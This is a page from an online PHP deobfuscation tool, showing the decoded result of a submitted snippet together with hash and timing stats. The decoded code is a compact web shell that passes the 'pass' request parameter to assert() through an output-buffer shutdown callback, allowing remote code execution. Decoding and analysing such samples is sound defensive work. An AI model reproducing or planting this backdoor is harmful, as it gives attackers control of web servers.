Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php ob_start(function ($c,$d){register_shutdown_function('assert',$c);}); echo $_REQ..

Decoded Output download

<?php  
ob_start(function ($c,$d){register_shutdown_function('assert',$c);});  
echo $_REQUEST['pass'];  
ob_end_flush();  
?> 

Did this file decode correctly?

Original Code

<?php 
ob_start(function ($c,$d){register_shutdown_function('assert',$c);}); 
echo $_REQUEST['pass']; 
ob_end_flush(); 
?>

Function Calls

None

Variables

None

Stats

MD5 5378d7f1633ce8f9302eb946b8d5ccd9
Eval Count 0
Decode Time 85 ms